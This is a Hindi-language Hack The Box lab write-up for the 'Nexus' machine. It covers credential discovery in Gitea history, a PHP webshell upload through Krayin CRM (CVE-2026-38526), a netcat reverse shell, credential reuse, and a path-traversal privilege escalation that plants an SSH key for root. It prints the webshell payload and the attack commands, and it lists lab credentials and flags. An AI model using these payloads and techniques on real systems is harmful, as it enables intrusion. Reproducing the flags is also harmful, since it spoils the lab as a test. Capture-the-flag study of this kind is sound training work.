
# Hack The Box Nexus मशीन राइट-अप: रिकॉनिसेंस, Gitea क्रेडेंशियल डिस्कवरी, CVE-2026-38526 के माध्यम से Krayin CRM शोषण, प्रारंभिक पहुंच, और एक कमजोर Gitea टेम्पलेट सिंक्रोनाइज़ेशन सेवा के माध्यम से विशेषाधिकार वृद्धि।
English 🇺🇸 | Español 🇪🇸
Nexus हैक द बॉक्स की एक आसान-कठिनाई वाली Linux मशीन है जो एक बहु-चरणीय हमले की श्रृंखला प्रदर्शित करती है जिसमें वर्चुअल होस्ट एन्यूमरेशन, उजागर क्रेडेंशियल्स, कमजोर वेब एप्लिकेशन कार्यक्षमता, रिमोट कोड निष्पादन, क्रेडेंशियल पुन: उपयोग और स्थानीय विशेषाधिकार वृद्धि शामिल है।
Reconnaissance
│
▼
Virtual Host Enumeration
│
├── git.nexus.htb
└── billing.nexus.htb
│
▼
Gitea Commit History
│
▼
Exposed Credentials
│
▼
Krayin CRM Login
│
▼
CVE-2026-38526
│
▼
PHP Webshell
│
▼
Reverse Shell
(www-data)
│
▼
Application .env
│
▼
SSH as jones
│
▼
gitea-template-sync
│
▼
Path Traversal
│
▼
Malicious Git Repository
│
▼
SSH as root
root तक विशेषाधिकार वृद्धिलक्ष्य IP: 10.129.82.92
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http nginx 1.24.0 (Ubuntu)
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain
git.nexus.htb → Gitea
billing.nexus.htb → Krayin CRM
खोजे गए होस्ट को /etc/hosts में जोड़ें:
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts
यहाँ नेविगेट करें:
http://git.nexus.htb
एक रिपॉजिटरी जिसका नाम है:
admin/krayin-docker-setup
इसके Git इतिहास में उपयोगी जानकारी शामिल है।
.env फ़ाइल को पिछले कमिट से पुनर्प्राप्त किया जा सकता है, जिससे ऐसे क्रेडेंशियल उजागर होते हैं जो वर्तमान संस्करण में अब मौजूद नहीं हैं।
| सेवा | उपयोगकर्ता नाम | पासवर्ड |
|---|---|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
ईमेल पता [email protected] मुख्य वेबसाइट के रोजगार अनुभाग में भी पहचाना गया था।
URL: http://billing.nexus.htb/admin/login
Email: [email protected]
Password: N27xh!!2ucY04
यहाँ नेविगेट करें:
/admin/mail/sent
फिर:
पेलोड यहाँ संग्रहीत है:
exploits/CVE-2026-38526/shell.php
पेलोड:
<?php system($_GET["cmd"]); ?>
प्रासंगिक मल्टीपार्ट फ़ील्ड हैं:
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php
सफल अपलोड के बाद:
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id
अपेक्षित परिणाम:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
एक लिसनर शुरू करें:
nc -lvnp 4444
फिर अपलोड किए गए वेबशेल के माध्यम से रिवर्स शेल ट्रिगर करें।
Python कार्यान्वयन यहाँ उपलब्ध है:
exploits/CVE-2026-38526/reverse_shell.py
इस चरण में शेल इस रूप में प्राप्त होता है:
www-data
Krayin कॉन्फ़िगरेशन का निरीक्षण करें:
cat /var/www/krayin/.env
क्रेडेंशियल मिलते हैं:
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR
cat /etc/passwd | grep sh$
jones खाते की पहचान की जाती है।
पासवर्ड:
y27xb3ha!!74GbR
f20cbf9aeb6bb228d356a42ff49c1933
systemctl list-units | grep -i gitea
निम्नलिखित सेवा और टाइमर की पहचान की जाती है:
gitea-template-sync.timer
gitea-template-sync.service
सेवा उन्नत विशेषाधिकारों के साथ निष्पादित होती है।
/etc/gitea/template-sync.py
सिंक्रनाइज़ेशन तंत्र पाथ निर्माण का उपयोग करता है जिसका पाथ ट्रैवर्सल के माध्यम से दुरुपयोग किया जा सकता है।
SSH कुंजी जोड़ी उत्पन्न करें:
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub
Git ऑब्जेक्ट हेरफेर शोषण यहाँ स्थित है:
exploits/gitea_template_sync/exploit_git.py
रिपॉजिटरी बनाएं:
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit
git init
python3 exploit_git.py
रिपॉजिटरी को इस ब्रांच का उपयोग करना चाहिए:
main
इसके माध्यम से एक व्यक्तिगत एक्सेस टोकन उत्पन्न करें:
http://git.nexus.htb
यहाँ नेविगेट करें:
Settings → Applications
फिर रिमोट कॉन्फ़िगर करें:
git remote set-url origin http://jones:[email protected]/jones/exploit.git
दुर्भावनापूर्ण रिपॉजिटरी पुश करें:
git push -f origin main
सिंक्रनाइज़ेशन लॉग की निगरानी करें:
tail -f /var/log/template-sync.log
सफल सिंक्रनाइज़ेशन के परिणामस्वरूप दुर्भावनापूर्ण Git ट्री को विशेषाधिकार प्राप्त सेवा द्वारा संसाधित किया जाता है।
उदाहरण:
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30] synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete
एक बार SSH सार्वजनिक कुंजी रूट खाते में लिख दी जाए:
ssh -i /tmp/nexus_root [email protected]
पहुंच सत्यापित करें:
whoami
अपेक्षित:
root
रूट फ़्लैग प्राप्त करें:
cat /root/root.txt
85be1d2a3084e387da0e7dd118908c63
| फ़्लैग | मान |
|---|---|
| User | f20cbf9aeb6bb228d356a42ff49c1933 |
| Root | 85be1d2a3084e387da0e7dd118908c63 |
ये क्रेडेंशियल हैक द बॉक्स प्रयोगशाला वातावरण से संबंधित हैं जिसे इस रिपॉजिटरी द्वारा प्रलेखित किया गया है।
htb-labs-nexus/
├── README.md
├── exploits/
│ ├── CVE-2026-38526/
│ │ ├── shell.php
│ │ ├── reverse_shell.py
│ │ └── burp_request.txt
│ └── gitea_template_sync/
│ ├── exploit_git.py
│ ├── create_repo.sh
│ └── key.pub
├── scripts/
│ ├── linpeas.sh
│ ├── LinEnum.sh
│ └── enum_services.sh
├── assets/
│ ├── nmap_scan.txt
│ ├── gobuster_vhost.txt
│ └── credentials.txt
├── screenshots/
│ ├── gitea_repo.png
│ ├── crm_login.png
│ ├── webshell.png
│ └── root_flag.png
└── notes/
├── methodology.md
├── commands.md
└── credentials.md
यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।
यहां प्रलेखित तकनीकों, क्रेडेंशियल्स, शोषणों और कमांडों का उपयोग स्पष्ट प्राधिकरण के बिना किसी भी सिस्टम के विरुद्ध नहीं किया जाना चाहिए।
root के रूप में चलने वाली सेवा विशेषाधिकार वृद्धि वेक्टर बन सकती है।⭐ यदि आपको यह राइट-अप उपयोगी लगा, तो रिपॉजिटरी को स्टार देने पर विचार करें।
| सेवा | उपयोगकर्ता नाम | पासवर्ड / कुंजी |
|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
| Gitea Token | jones | 1dd7105bf7e57cad02c5a56af5d92703a7839364 |
| SSH | jones | y27xb3ha!!74GbR |
| SSH Root | root | /tmp/nexus_root |
| उपकरण | उद्देश्य |
|---|
| Nmap | पोर्ट और सेवा एन्यूमरेशन |
| Gobuster | वर्चुअल होस्ट एन्यूमरेशन |
| Burp Suite | HTTP अनुरोध इंटरसेप्शन और संशोधन |
| Git | रिपॉजिटरी विश्लेषण और दुर्भावनापूर्ण रिपॉजिटरी निर्माण |
| Python 3 | शोषण स्क्रिप्ट |
| Netcat | रिवर्स शेल लिसनर |
| LinEnum | Linux एन्यूमरेशन |
| LinPEAS | विशेषाधिकार वृद्धि एन्यूमरेशन |
| SSH | रिमोट एक्सेस |